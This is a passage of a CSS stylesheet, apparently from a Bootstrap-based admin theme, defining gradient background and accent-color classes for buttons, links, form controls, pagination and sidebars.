.bg-gradient-maroon.btn:hover {
background: #b61751 linear-gradient(180deg, #c13a6b, #b61751) repeat-x !important;
}
.bg-gradient-maroon.btn:not(:disabled):not(.disabled):active, .bg-gradient-maroon.btn:not(:disabled):not(.disabled).active, .bg-gradient-maroon.btn:active, .bg-gradient-maroon.btn.active {
border-color: #9f1447;
color: #ffffff;
}
.bg-gradient-maroon.btn:not(:disabled):not(.disabled):active, .bg-gradient-maroon.btn:not(:disabled):not(.disabled).active, .bg-gradient-maroon.btn:active, .bg-gradient-maroon.btn.active {
background: #ab154c linear-gradient(180deg, #b73867, #ab154c) repeat-x !important;
}
.bg-gradient-blue {
color: #ffffff;
}
.bg-gradient-blue {
background: #007bff linear-gradient(180deg, #268fff, #007bff) repeat-x !important;
}
.bg-gradient-blue.btn.disabled, .bg-gradient-blue.btn:disabled, .bg-gradient-blue.btn:not(:disabled):not(.disabled):active, .bg-gradient-blue.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-blue.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-blue.btn:hover {
border-color: #0062cc;
color: #ececec;
}
.bg-gradient-blue.btn:hover {
background: #0069d9 linear-gradient(180deg, #267fde, #0069d9) repeat-x !important;
}
.bg-gradient-blue.btn:not(:disabled):not(.disabled):active, .bg-gradient-blue.btn:not(:disabled):not(.disabled).active, .bg-gradient-blue.btn:active, .bg-gradient-blue.btn.active {
border-color: #005cbf;
color: #ffffff;
}
.bg-gradient-blue.btn:not(:disabled):not(.disabled):active, .bg-gradient-blue.btn:not(:disabled):not(.disabled).active, .bg-gradient-blue.btn:active, .bg-gradient-blue.btn.active {
background: #0062cc linear-gradient(180deg, #267ad4, #0062cc) repeat-x !important;
}
.bg-gradient-indigo {
color: #ffffff;
}
.bg-gradient-indigo {
background: #6610f2 linear-gradient(180deg, #7d34f4, #6610f2) repeat-x !important;
}
.bg-gradient-indigo.btn.disabled, .bg-gradient-indigo.btn:disabled, .bg-gradient-indigo.btn:not(:disabled):not(.disabled):active, .bg-gradient-indigo.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-indigo.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-indigo.btn:hover {
border-color: #510bc4;
color: #ececec;
}
.bg-gradient-indigo.btn:hover {
background: #560bd0 linear-gradient(180deg, #7030d7, #560bd0) repeat-x !important;
}
.bg-gradient-indigo.btn:not(:disabled):not(.disabled):active, .bg-gradient-indigo.btn:not(:disabled):not(.disabled).active, .bg-gradient-indigo.btn:active, .bg-gradient-indigo.btn.active {
border-color: #4c0ab8;
color: #ffffff;
}
.bg-gradient-indigo.btn:not(:disabled):not(.disabled):active, .bg-gradient-indigo.btn:not(:disabled):not(.disabled).active, .bg-gradient-indigo.btn:active, .bg-gradient-indigo.btn.active {
background: #510bc4 linear-gradient(180deg, #6b2fcd, #510bc4) repeat-x !important;
}
.bg-gradient-purple {
color: #ffffff;
}
.bg-gradient-purple {
background: #6f42c1 linear-gradient(180deg, #855eca, #6f42c1) repeat-x !important;
}
.bg-gradient-purple.btn.disabled, .bg-gradient-purple.btn:disabled, .bg-gradient-purple.btn:not(:disabled):not(.disabled):active, .bg-gradient-purple.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-purple.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-purple.btn:hover {
border-color: #59339d;
color: #ececec;
}
.bg-gradient-purple.btn:hover {
background: #5e37a6 linear-gradient(180deg, #7655b4, #5e37a6) repeat-x !important;
}
.bg-gradient-purple.btn:not(:disabled):not(.disabled):active, .bg-gradient-purple.btn:not(:disabled):not(.disabled).active, .bg-gradient-purple.btn:active, .bg-gradient-purple.btn.active {
border-color: #533093;
color: #ffffff;
}
.bg-gradient-purple.btn:not(:disabled):not(.disabled):active, .bg-gradient-purple.btn:not(:disabled):not(.disabled).active, .bg-gradient-purple.btn:active, .bg-gradient-purple.btn.active {
background: #59339d linear-gradient(180deg, #7252ab, #59339d) repeat-x !important;
}
.bg-gradient-pink {
color: #ffffff;
}
.bg-gradient-pink {
background: #e83e8c linear-gradient(180deg, #eb5b9d, #e83e8c) repeat-x !important;
}
.bg-gradient-pink.btn.disabled, .bg-gradient-pink.btn:disabled, .bg-gradient-pink.btn:not(:disabled):not(.disabled):active, .bg-gradient-pink.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-pink.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-pink.btn:hover {
border-color: #d91a72;
color: #ececec;
}
.bg-gradient-pink.btn:hover {
background: #e41c78 linear-gradient(180deg, #e83e8c, #e41c78) repeat-x !important;
}
.bg-gradient-pink.btn:not(:disabled):not(.disabled):active, .bg-gradient-pink.btn:not(:disabled):not(.disabled).active, .bg-gradient-pink.btn:active, .bg-gradient-pink.btn.active {
border-color: #ce196c;
color: #ffffff;
}
.bg-gradient-pink.btn:not(:disabled):not(.disabled):active, .bg-gradient-pink.btn:not(:disabled):not(.disabled).active, .bg-gradient-pink.btn:active, .bg-gradient-pink.btn.active {
background: #d91a72 linear-gradient(180deg, #df3c87, #d91a72) repeat-x !important;
}
.bg-gradient-red {
color: #ffffff;
}
.bg-gradient-red {
background: #dc3545 linear-gradient(180deg, #e15361, #dc3545) repeat-x !important;
}
.bg-gradient-red.btn.disabled, .bg-gradient-red.btn:disabled, .bg-gradient-red.btn:not(:disabled):not(.disabled):active, .bg-gradient-red.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-red.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-red.btn:hover {
border-color: #bd2130;
color: #ececec;
}
.bg-gradient-red.btn:hover {
background: #c82333 linear-gradient(180deg, #d04451, #c82333) repeat-x !important;
}
.bg-gradient-red.btn:not(:disabled):not(.disabled):active, .bg-gradient-red.btn:not(:disabled):not(.disabled).active, .bg-gradient-red.btn:active, .bg-gradient-red.btn.active {
border-color: #b21f2d;
color: #ffffff;
}
.bg-gradient-red.btn:not(:disabled):not(.disabled):active, .bg-gradient-red.btn:not(:disabled):not(.disabled).active, .bg-gradient-red.btn:active, .bg-gradient-red.btn.active {
background: #bd2130 linear-gradient(180deg, #c7424f, #bd2130) repeat-x !important;
}
.bg-gradient-orange {
color: #1F2D3D;
}
.bg-gradient-orange {
background: #fd7e14 linear-gradient(180deg, #fd9137, #fd7e14) repeat-x !important;
}
.bg-gradient-orange.btn.disabled, .bg-gradient-orange.btn:disabled, .bg-gradient-orange.btn:not(:disabled):not(.disabled):active, .bg-gradient-orange.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-orange.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-orange.btn:hover {
border-color: #dc6502;
color: #121a24;
}
.bg-gradient-orange.btn:hover {
background: #e96b02 linear-gradient(180deg, #ec8128, #e96b02) repeat-x !important;
}
.bg-gradient-orange.btn:not(:disabled):not(.disabled):active, .bg-gradient-orange.btn:not(:disabled):not(.disabled).active, .bg-gradient-orange.btn:active, .bg-gradient-orange.btn.active {
border-color: #cf5f02;
color: #ffffff;
}
.bg-gradient-orange.btn:not(:disabled):not(.disabled):active, .bg-gradient-orange.btn:not(:disabled):not(.disabled).active, .bg-gradient-orange.btn:active, .bg-gradient-orange.btn.active {
background: #dc6502 linear-gradient(180deg, #e17c28, #dc6502) repeat-x !important;
}
.bg-gradient-yellow {
color: #1F2D3D;
}
.bg-gradient-yellow {
background: #ffc107 linear-gradient(180deg, #ffca2c, #ffc107) repeat-x !important;
}
.bg-gradient-yellow.btn.disabled, .bg-gradient-yellow.btn:disabled, .bg-gradient-yellow.btn:not(:disabled):not(.disabled):active, .bg-gradient-yellow.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-yellow.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-yellow.btn:hover {
border-color: #d39e00;
color: #121a24;
}
.bg-gradient-yellow.btn:hover {
background: #e0a800 linear-gradient(180deg, #e4b526, #e0a800) repeat-x !important;
}
.bg-gradient-yellow.btn:not(:disabled):not(.disabled):active, .bg-gradient-yellow.btn:not(:disabled):not(.disabled).active, .bg-gradient-yellow.btn:active, .bg-gradient-yellow.btn.active {
border-color: #c69500;
color: #1F2D3D;
}
.bg-gradient-yellow.btn:not(:disabled):not(.disabled):active, .bg-gradient-yellow.btn:not(:disabled):not(.disabled).active, .bg-gradient-yellow.btn:active, .bg-gradient-yellow.btn.active {
background: #d39e00 linear-gradient(180deg, #daad26, #d39e00) repeat-x !important;
}
.bg-gradient-green {
color: #ffffff;
}
.bg-gradient-green {
background: #28a745 linear-gradient(180deg, #48b461, #28a745) repeat-x !important;
}
.bg-gradient-green.btn.disabled, .bg-gradient-green.btn:disabled, .bg-gradient-green.btn:not(:disabled):not(.disabled):active, .bg-gradient-green.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-green.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-green.btn:hover {
border-color: #1e7e34;
color: #ececec;
}
.bg-gradient-green.btn:hover {
background: #218838 linear-gradient(180deg, #429a56, #218838) repeat-x !important;
}
.bg-gradient-green.btn:not(:disabled):not(.disabled):active, .bg-gradient-green.btn:not(:disabled):not(.disabled).active, .bg-gradient-green.btn:active, .bg-gradient-green.btn.active {
border-color: #1c7430;
color: #ffffff;
}
.bg-gradient-green.btn:not(:disabled):not(.disabled):active, .bg-gradient-green.btn:not(:disabled):not(.disabled).active, .bg-gradient-green.btn:active, .bg-gradient-green.btn.active {
background: #1e7e34 linear-gradient(180deg, #409152, #1e7e34) repeat-x !important;
}
.bg-gradient-teal {
color: #ffffff;
}
.bg-gradient-teal {
background: #20c997 linear-gradient(180deg, #41d1a7, #20c997) repeat-x !important;
}
.bg-gradient-teal.btn.disabled, .bg-gradient-teal.btn:disabled, .bg-gradient-teal.btn:not(:disabled):not(.disabled):active, .bg-gradient-teal.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-teal.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-teal.btn:hover {
border-color: #199d76;
color: #ececec;
}
.bg-gradient-teal.btn:hover {
background: #1ba87e linear-gradient(180deg, #3db592, #1ba87e) repeat-x !important;
}
.bg-gradient-teal.btn:not(:disabled):not(.disabled):active, .bg-gradient-teal.btn:not(:disabled):not(.disabled).active, .bg-gradient-teal.btn:active, .bg-gradient-teal.btn.active {
border-color: #17926e;
color: #ffffff;
}
.bg-gradient-teal.btn:not(:disabled):not(.disabled):active, .bg-gradient-teal.btn:not(:disabled):not(.disabled).active, .bg-gradient-teal.btn:active, .bg-gradient-teal.btn.active {
background: #199d76 linear-gradient(180deg, #3bac8b, #199d76) repeat-x !important;
}
.bg-gradient-cyan {
color: #ffffff;
}
.bg-gradient-cyan {
background: #17a2b8 linear-gradient(180deg, #3ab0c3, #17a2b8) repeat-x !important;
}
.bg-gradient-cyan.btn.disabled, .bg-gradient-cyan.btn:disabled, .bg-gradient-cyan.btn:not(:disabled):not(.disabled):active, .bg-gradient-cyan.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-cyan.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-cyan.btn:hover {
border-color: #117a8b;
color: #ececec;
}
.bg-gradient-cyan.btn:hover {
background: #138496 linear-gradient(180deg, #3697a6, #138496) repeat-x !important;
}
.bg-gradient-cyan.btn:not(:disabled):not(.disabled):active, .bg-gradient-cyan.btn:not(:disabled):not(.disabled).active, .bg-gradient-cyan.btn:active, .bg-gradient-cyan.btn.active {
border-color: #10707f;
color: #ffffff;
}
.bg-gradient-cyan.btn:not(:disabled):not(.disabled):active, .bg-gradient-cyan.btn:not(:disabled):not(.disabled).active, .bg-gradient-cyan.btn:active, .bg-gradient-cyan.btn.active {
background: #117a8b linear-gradient(180deg, #358e9c, #117a8b) repeat-x !important;
}
.bg-gradient-white {
color: #1F2D3D;
}
.bg-gradient-white {
background: #ffffff linear-gradient(180deg, white, #ffffff) repeat-x !important;
}
.bg-gradient-white.btn.disabled, .bg-gradient-white.btn:disabled, .bg-gradient-white.btn:not(:disabled):not(.disabled):active, .bg-gradient-white.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-white.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-white.btn:hover {
border-color: #e6e6e6;
color: #121a24;
}
.bg-gradient-white.btn:hover {
background: #ececec linear-gradient(180deg, #efefef, #ececec) repeat-x !important;
}
.bg-gradient-white.btn:not(:disabled):not(.disabled):active, .bg-gradient-white.btn:not(:disabled):not(.disabled).active, .bg-gradient-white.btn:active, .bg-gradient-white.btn.active {
border-color: #dfdfdf;
color: #1F2D3D;
}
.bg-gradient-white.btn:not(:disabled):not(.disabled):active, .bg-gradient-white.btn:not(:disabled):not(.disabled).active, .bg-gradient-white.btn:active, .bg-gradient-white.btn.active {
background: #e6e6e6 linear-gradient(180deg, #e9e9e9, #e6e6e6) repeat-x !important;
}
.bg-gradient-gray {
color: #ffffff;
}
.bg-gradient-gray {
background: #6c757d linear-gradient(180deg, #828a91, #6c757d) repeat-x !important;
}
.bg-gradient-gray.btn.disabled, .bg-gradient-gray.btn:disabled, .bg-gradient-gray.btn:not(:disabled):not(.disabled):active, .bg-gradient-gray.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-gray.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-gray.btn:hover {
border-color: #545b62;
color: #ececec;
}
.bg-gradient-gray.btn:hover {
background: #5a6268 linear-gradient(180deg, #73797f, #5a6268) repeat-x !important;
}
.bg-gradient-gray.btn:not(:disabled):not(.disabled):active, .bg-gradient-gray.btn:not(:disabled):not(.disabled).active, .bg-gradient-gray.btn:active, .bg-gradient-gray.btn.active {
border-color: #4e555b;
color: #ffffff;
}
.bg-gradient-gray.btn:not(:disabled):not(.disabled):active, .bg-gradient-gray.btn:not(:disabled):not(.disabled).active, .bg-gradient-gray.btn:active, .bg-gradient-gray.btn.active {
background: #545b62 linear-gradient(180deg, #6e7479, #545b62) repeat-x !important;
}
.bg-gradient-gray-dark {
color: #ffffff;
}
.bg-gradient-gray-dark {
background: #343a40 linear-gradient(180deg, #52585d, #343a40) repeat-x !important;
}
.bg-gradient-gray-dark.btn.disabled, .bg-gradient-gray-dark.btn:disabled, .bg-gradient-gray-dark.btn:not(:disabled):not(.disabled):active, .bg-gradient-gray-dark.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-gray-dark.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-gray-dark.btn:hover {
border-color: #1d2124;
color: #ececec;
}
.bg-gradient-gray-dark.btn:hover {
background: #23272b linear-gradient(180deg, #44474b, #23272b) repeat-x !important;
}
.bg-gradient-gray-dark.btn:not(:disabled):not(.disabled):active, .bg-gradient-gray-dark.btn:not(:disabled):not(.disabled).active, .bg-gradient-gray-dark.btn:active, .bg-gradient-gray-dark.btn.active {
border-color: #171a1d;
color: #ffffff;
}
.bg-gradient-gray-dark.btn:not(:disabled):not(.disabled):active, .bg-gradient-gray-dark.btn:not(:disabled):not(.disabled).active, .bg-gradient-gray-dark.btn:active, .bg-gradient-gray-dark.btn.active {
background: #1d2124 linear-gradient(180deg, #3f4245, #1d2124) repeat-x !important;
}
[class^='bg-'].disabled {
opacity: .65;
}
a.text-muted:hover {
color: #007bff !important;
}
.link-muted {
color: #5d6974;
}
.link-muted:hover, .link-muted:focus {
color: #464f58;
}
.link-black {
color: #6c757d;
}
.link-black:hover, .link-black:focus {
color: #e6e8ea;
}
.accent-primary .btn-link,
.accent-primary a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #007bff;
}
.accent-primary .btn-link:hover,
.accent-primary a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #0056b3;
}
.accent-primary .dropdown-item:active, .accent-primary .dropdown-item.active {
background: #007bff;
color: #ffffff;
}
.accent-primary .custom-control-input:checked ~ .custom-control-label::before {
background: #007bff;
border-color: #004a99;
}
.accent-primary .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23ffffff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-primary .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-primary .custom-select:focus,
.accent-primary .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-primary .custom-file-input:focus ~ .custom-file-label {
border-color: #80bdff;
}
.accent-primary .page-item.active .page-link {
background-color: #007bff;
border-color: #007bff;
}
.accent-primary .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-primary [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-primary [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-primary [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-primary [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-secondary .btn-link,
.accent-secondary a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #6c757d;
}
.accent-secondary .btn-link:hover,
.accent-secondary a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #494f54;
}
.accent-secondary .dropdown-item:active, .accent-secondary .dropdown-item.active {
background: #6c757d;
color: #ffffff;
}
.accent-secondary .custom-control-input:checked ~ .custom-control-label::before {
background: #6c757d;
border-color: #3d4246;
}
.accent-secondary .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23ffffff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-secondary .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-secondary .custom-select:focus,
.accent-secondary .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-secondary .custom-file-input:focus ~ .custom-file-label {
border-color: #afb5ba;
}
.accent-secondary .page-item.active .page-link {
background-color: #6c757d;
border-color: #6c757d;
}
.accent-secondary .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-secondary [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-secondary [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-secondary [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-secondary [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-success .btn-link,
.accent-success a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #28a745;
}
.accent-success .btn-link:hover,
.accent-success a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #19692c;
}
.accent-success .dropdown-item:active, .accent-success .dropdown-item.active {
background: #28a745;
color: #ffffff;
}
.accent-success .custom-control-input:checked ~ .custom-control-label::before {
background: #28a745;
border-color: #145523;
}
.accent-success .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23ffffff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-success .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-success .custom-select:focus,
.accent-success .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-success .custom-file-input:focus ~ .custom-file-label {
border-color: #71dd8a;
}
.accent-success .page-item.active .page-link {
background-color: #28a745;
border-color: #28a745;
}
.accent-success .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-success [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-success [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-success [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-success [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-info .btn-link,
.accent-info a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #17a2b8;
}
.accent-info .btn-link:hover,
.accent-info a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #0f6674;
}
.accent-info .dropdown-item:active, .accent-info .dropdown-item.active {
background: #17a2b8;
color: #ffffff;
}
.accent-info .custom-control-input:checked ~ .custom-control-label::before {
background: #17a2b8;
border-color: #0c525d;
}
.accent-info .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23ffffff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-info .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-info .custom-select:focus,
.accent-info .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-info .custom-file-input:focus ~ .custom-file-label {
border-color: #63d9ec;
}
.accent-info .page-item.active .page-link {
background-color: #17a2b8;
border-color: #17a2b8;
}
.accent-info .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-info [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-info [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-info [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-info [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-warning .btn-link,
.accent-warning a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #ffc107;
}
.accent-warning .btn-link:hover,
.accent-warning a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ba8b00;
}
.accent-warning .dropdown-item:active, .accent-warning .dropdown-item.active {
background: #ffc107;
color: #1F2D3D;
}
.accent-warning .custom-control-input:checked ~ .custom-control-label::before {
background: #ffc107;
border-color: #a07800;
}
.accent-warning .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%231F2D3D' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-warning .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-warning .custom-select:focus,
.accent-warning .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-warning .custom-file-input:focus ~ .custom-file-label {
border-color: #ffe187;
}
.accent-warning .page-item.active .page-link {
background-color: #ffc107;
border-color: #ffc107;
}
.accent-warning .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-warning [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-warning [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-warning [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-warning [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-danger .btn-link,
.accent-danger a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #dc3545;
}
.accent-danger .btn-link:hover,
.accent-danger a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #a71d2a;
}
.accent-danger .dropdown-item:active, .accent-danger .dropdown-item.active {
background: #dc3545;
color: #ffffff;
}
.accent-danger .custom-control-input:checked ~ .custom-control-label::before {
background: #dc3545;
border-color: #921925;
}
.accent-danger .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23ffffff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-danger .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-danger .custom-select:focus,
.accent-danger .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-danger .custom-file-input:focus ~ .custom-file-label {
border-color: #efa2a9;
}
.accent-danger .page-item.active .page-link {
background-color: #dc3545;
border-color: #dc3545;
}
.accent-danger .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-danger [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-danger [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-danger [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-danger [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-light .btn-link,
.accent-light a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #f8f9fa;
}
.accent-light .btn-link:hover,
.accent-light a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #cbd3da;
}
.accent-light .dropdown-item:active, .accent-light .dropdown-item.active {
background: #f8f9fa;
color: #1F2D3D;
}
.accent-light .custom-control-input:checked ~ .custom-control-label::before {
background: #f8f9fa;
border-color: #bdc6d0;
}
.accent-light .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%231F2D3D' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-light .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-light .custom-select:focus,
.accent-light .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-light .custom-file-input:focus ~ .custom-file-label {
border-color: white;
}
.accent-light .page-item.active .page-link {
background-color: #f8f9fa;
border-color: #f8f9fa;
}
.accent-light .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
.accent-light [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #C2C7D0;
}
.accent-light [class*="sidebar-dark-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #ffffff;
}
.accent-light [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-light [class*="sidebar-light-"] .sidebar a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #212529;
}
.accent-dark .btn-link,
.accent-dark a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link) {
color: #343a40;
}
.accent-dark .btn-link:hover,
.accent-dark a:not(.dropdown-item):not(.btn-app):not(.nav-link):not(.brand-link):hover {
color: #121416;
}
.accent-dark .dropdown-item:active, .accent-dark .dropdown-item.active {
background: #343a40;
color: #ffffff;
}
.accent-dark .custom-control-input:checked ~ .custom-control-label::before {
background: #343a40;
border-color: #060708;
}
.accent-dark .custom-control-input:checked ~ .custom-control-label::after {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3E%3Cpath fill='%23ffffff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3E%3C/svg%3E");
}
.accent-dark .form-control:focus:not(.is-invalid):not(.is-warning):not(.is-valid),
.accent-dark .custom-select:focus,
.accent-dark .custom-control-input:focus:not(:checked) ~ .custom-control-label::before,
.accent-dark .custom-file-input:focus ~ .custom-file-label {
border-color: #6d7a86;
}
.accent-dark .page-item.active .page-link {
background-color: #343a40;
border-color: #343a40;
}
.accent-dark .page-item.disabled .page-link {
background-color: #ffffff;
border-color: #dee2e6;
}
